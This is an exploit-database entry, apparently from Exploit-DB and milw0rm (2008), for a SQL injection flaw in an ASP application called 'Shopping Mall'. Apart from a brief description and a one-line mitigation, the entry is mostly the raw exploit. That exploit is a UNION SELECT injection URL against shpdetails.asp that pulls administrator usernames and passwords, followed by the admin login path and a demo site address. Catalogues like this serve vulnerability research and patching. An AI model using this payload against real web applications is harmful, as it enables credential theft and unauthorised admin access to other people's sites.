header-logo
Suggest Exploit
vendor:
Shopping Mall
by:
Osmanizim
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Shopping Mall
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Shopping Mall <= SQL Injection Vulnerability

A SQL injection vulnerability exists in Shopping Mall, which allows an attacker to execute arbitrary SQL commands via the 'ID' parameter in 'shpdetails.asp' and gain access to the admin panel via 'admlogin.asp'.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#By Osmanizim 
#Security Specialist
#Contacts > :(  www.osmanizim.com
#Title: Shopping Mall <=  SQL Injection Vulnerability.
#Demo : http://freeasp.sepcity.com/shopmall/default.asp



//  Exploit -->


http://localhost/shopmall/shpdetails.asp?ID=1 union select 0,1,2,username,password,5,6,7,8,9 from administrators




// Admin -->


http://localhost/shopmall/admlogin.asp?

# milw0rm.com [2008-12-29]

Navigation

Suggest Exploit

Services By CQR